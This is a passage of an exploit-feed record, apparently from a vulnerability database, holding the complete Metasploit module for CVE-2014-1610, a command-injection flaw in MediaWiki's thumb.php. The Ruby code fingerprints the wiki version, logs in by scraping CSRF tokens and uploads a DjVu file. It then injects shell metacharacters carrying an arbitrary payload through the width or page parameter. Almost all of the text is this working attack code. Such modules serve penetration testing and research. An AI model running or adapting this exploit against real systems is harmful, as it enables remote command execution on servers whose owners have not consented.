If no target file is specified this module will attempt to log in with the provided credentials to upload a file (.DjVu) to use for exploitation.\n", "published": "2014-02-07T20:37:44", "type": "metasploit", "title": "MediaWiki Thumb.php Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/MEDIAWIKI_THUMB", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MediaWiki Thumb.php Remote Command Execution',\n 'Description' => %q{\n MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\n when DjVu or PDF file upload support is enabled, allows remote unauthenticated\n users to execute arbitrary commands via shell metacharacters. 
If no target file\n is specified this module will attempt to log in with the provided credentials to\n upload a file (.DjVu) to use for exploitation.\n },\n 'Author' =>\n [\n 'Netanel Rubin', # from Check Point - Discovery\n 'Brandon Perry', # Metasploit Module\n 'Ben Harris', # Metasploit Module\n 'Ben Campbell' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2014-1610' ],\n [ 'OSVDB', '102630'],\n [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],\n [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]\n ],\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Automatic PHP-CLI',\n {\n 'Payload' =>\n {\n 'BadChars' => \"\\r\\n\",\n 'PrependEncoder' => \"php -r \\\"\",\n 'AppendEncoder' => \"\\\"\"\n },\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP\n }\n ],\n [ 'Linux CMD',\n {\n 'Payload' =>\n {\n 'BadChars' => \"\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl python php',\n }\n },\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD\n }\n ],\n [ 'Windows CMD',\n {\n 'Payload' =>\n {\n 'BadChars' => \"\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl',\n }\n },\n 'Platform' => ['win'],\n 'Arch' => ARCH_CMD\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2014-01-28'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base MediaWiki path\", '/mediawiki' ]),\n OptString.new('FILENAME', [ false, \"Target DjVu/PDF file (e.g target.djvu target.pdf)\", nil ]),\n OptString.new('USERNAME', [ false, \"Username to authenticate with\", '' ]),\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", '' ])\n ])\n end\n\n def get_version(body)\n meta_generator = get_html_value(body, 'meta', 'generator', 'content')\n\n unless meta_generator\n vprint_status(\"No META Generator tag on #{full_uri}.\")\n return nil, nil, nil\n end\n\n if meta_generator && meta_generator =~ 
/mediawiki/i\n vprint_status(\"#{meta_generator} detected.\")\n meta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/\n major = $1.to_i\n minor = $2.to_i\n patch = $3.to_i\n vprint_status(\"Major:#{major} Minor:#{minor} Patch:#{patch}\")\n\n return major, minor, patch\n end\n\n return nil, nil, nil\n end\n\n def check\n uri = target_uri.path\n\n opts = { 'uri' => normalize_uri(uri, 'index.php') }\n\n response = send_request_cgi!(opts)\n\n if opts['redirect_uri']\n vprint_status(\"Redirected to #{opts['redirect_uri']}.\")\n end\n\n unless response\n vprint_status(\"No response from #{full_uri}.\")\n return CheckCode::Unknown\n end\n\n # Mediawiki will give a 404 for unknown pages but still have a body\n if response.code == 200 || response.code == 404\n vprint_status(\"#{response.code} response received...\")\n\n major, minor, patch = get_version(response.body)\n\n unless major\n return CheckCode::Unknown\n end\n\n if major == 1 && (minor < 8 || minor > 22)\n return CheckCode::Safe\n elsif major == 1 && (minor == 22 && patch > 1)\n return CheckCode::Safe\n elsif major == 1 && (minor == 21 && patch > 4)\n return CheckCode::Safe\n elsif major == 1 && (minor == 19 && patch > 10)\n return CheckCode::Safe\n elsif major == 1\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n vprint_status(\"Received response code #{response.code} from #{full_uri}\")\n CheckCode::Unknown\n end\n\n def exploit\n uri = target_uri.path\n\n print_status(\"Grabbing version and login CSRF token...\")\n response = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php'),\n 'vars_get' => { 'title' => 'Special:UserLogin' }\n })\n\n unless response\n fail_with(Failure::NotFound, \"Failed to retrieve webpage.\")\n end\n\n server = response['Server']\n if server && target.name =~ /automatic/i && server =~ /win32/i\n vprint_status(\"Windows platform detected: #{server}.\")\n my_platform = Msf::Module::Platform::Windows\n elsif server && target.name =~ /automatic/i\n 
vprint_status(\"Nix platform detected: #{server}.\")\n my_platform = Msf::Module::Platform::Unix\n else\n my_platform = target.platform.platforms.first\n end\n\n # If we have already identified a DjVu/PDF file on the server trigger\n # the exploit\n unless datastore['FILENAME'].blank?\n payload_request(uri, datastore['FILENAME'], my_platform)\n return\n end\n\n username = datastore['USERNAME']\n password = datastore['PASSWORD']\n\n major, minor, patch = get_version(response.body)\n\n # Upload CSRF added in v1.18.2\n # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1\n if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))\n upload_csrf = false\n elsif ((major == 1) && (minor < 18))\n upload_csrf = false\n else\n upload_csrf = true\n end\n\n session_cookie = response.get_cookies\n\n wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')\n\n if wp_login_token.blank?\n fail_with(Failure::UnexpectedReply, \"Couldn't find login token. Is URI set correctly?\")\n else\n print_good(\"Retrieved login CSRF token.\")\n end\n\n print_status(\"Attempting to login...\")\n login = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php'),\n 'method' => 'POST',\n 'vars_get' => {\n 'title' => 'Special:UserLogin',\n 'action' => 'submitlogin',\n 'type' => 'login'\n },\n 'cookie' => session_cookie,\n 'vars_post' => {\n 'wpName' => username,\n 'wpPassword' => password,\n 'wpLoginAttempt' => 'Log in',\n 'wpLoginToken' => wp_login_token\n }\n })\n\n if login and login.code == 302\n print_good(\"Log in successful.\")\n else\n fail_with(Failure::NoAccess, \"Failed to log in.\")\n end\n\n auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')\n\n # Testing v1.15.1 it looks like it has session fixation\n # vulnerability so we dont get a new session cookie after\n # authenticating. Therefore we need to include our old cookie.\n unless auth_cookie.include? 
'session='\n auth_cookie << session_cookie\n end\n\n print_status(\"Getting upload CSRF token...\") if upload_csrf\n upload_file = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\n 'cookie' => auth_cookie\n })\n\n unless upload_file and upload_file.code == 200\n fail_with(Failure::NotFound, \"Failed to access file upload page.\")\n end\n\n wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf\n wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')\n title = get_html_value(upload_file.body, 'input', 'title', 'value')\n\n if upload_csrf && wp_edit_token.blank?\n fail_with(Failure::UnexpectedReply, \"Couldn't find upload token. Is URI set correctly?\")\n elsif upload_csrf\n print_good(\"Retrieved upload CSRF token.\")\n end\n\n upload_mime = Rex::MIME::Message.new\n\n djvu_file = ::File.read(::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2014-1610\", \"metasploit.djvu\"))\n file_name = \"#{rand_text_alpha(4)}.djvu\"\n\n upload_mime.add_part(djvu_file, \"application/octet-stream\", \"binary\", \"form-data; name=\\\"wpUploadFile\\\"; filename=\\\"#{file_name}\\\"\")\n upload_mime.add_part(\"#{file_name}\", nil, nil, \"form-data; name=\\\"wpDestFile\\\"\")\n upload_mime.add_part(\"#{rand_text_alpha(4)}\", nil, nil, \"form-data; name=\\\"wpUploadDescription\\\"\")\n upload_mime.add_part(\"\", nil, nil, \"form-data; name=\\\"wpLicense\\\"\")\n upload_mime.add_part(\"1\",nil,nil, \"form-data; name=\\\"wpIgnoreWarning\\\"\")\n upload_mime.add_part(wp_edit_token, nil, nil, \"form-data; name=\\\"wpEditToken\\\"\") if upload_csrf\n upload_mime.add_part(title, nil, nil, \"form-data; name=\\\"title\\\"\")\n upload_mime.add_part(\"1\", nil, nil, \"form-data; name=\\\"wpDestFileWarningAck\\\"\")\n upload_mime.add_part(wp_upload, nil, nil, \"form-data; name=\\\"wpUpload\\\"\")\n post_data = upload_mime.to_s\n\n print_status(\"Uploading DjVu file #{file_name}...\")\n\n upload 
= send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\n 'data' => post_data,\n 'ctype' => \"multipart/form-data; boundary=#{upload_mime.bound}\",\n 'cookie' => auth_cookie\n })\n\n if upload and upload.code == 302 and upload.headers['Location']\n location = upload.headers['Location']\n print_good(\"File uploaded to #{location}\")\n else\n if upload.body.include? 'not a permitted file type'\n fail_with(Failure::NotVulnerable, \"Wiki is not configured for target files.\")\n else\n fail_with(Failure::UnexpectedReply, \"Failed to upload file.\")\n end\n end\n\n payload_request(uri, file_name, my_platform)\n end\n\n def payload_request(uri, file_name, my_platform)\n if my_platform == Msf::Module::Platform::Windows\n trigger = \"1)&(#{payload.encoded})&\"\n else\n trigger = \"1;#{payload.encoded};\"\n end\n\n vars_get = { 'f' => file_name }\n if file_name.include? '.pdf'\n vars_get['width'] = trigger\n elsif file_name.include? '.djvu'\n vars_get['width'] = 1\n vars_get['p'] = trigger\n else\n fail_with(Failure::BadConfig, \"Unsupported file extension: #{file_name}\")\n end\n\n print_status(\"Sending payload request...\")\n r = send_request_cgi({\n 'uri' => normalize_uri(uri, 'thumb.php'),\n 'vars_get' => vars_get\n }, 1)\n\n if r && r.code == 404 && r.body =~ /not exist/\n print_error(\"File: #{file_name} does not exist.\")\n elsif r\n print_error(\"Received response #{r.code}, exploit probably failed\")\n end\n end\n\n # The order of name, value keeps shifting so regex is painful.\n # Cant use nokogiri due to security issues\n # Cant use REXML directly as its not strict XHTML\n # So we do a filthy mixture of regex and REXML\n def get_html_value(html, type, name, value)\n return nil unless html\n return nil unless type\n return nil unless name\n return nil unless value\n\n found = nil\n html.each_line do |line|\n if line =~ /(<#{type}[^\\/]*name=\"#{name}\".*?\\/>)/i\n found = $&\n break\n end\n end\n\n if found\n doc = 
REXML::Document.new found\n return doc.root.attributes[value]\n end\n\n ''\n end\nend\n\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/mediawiki_thumb.rb"}]}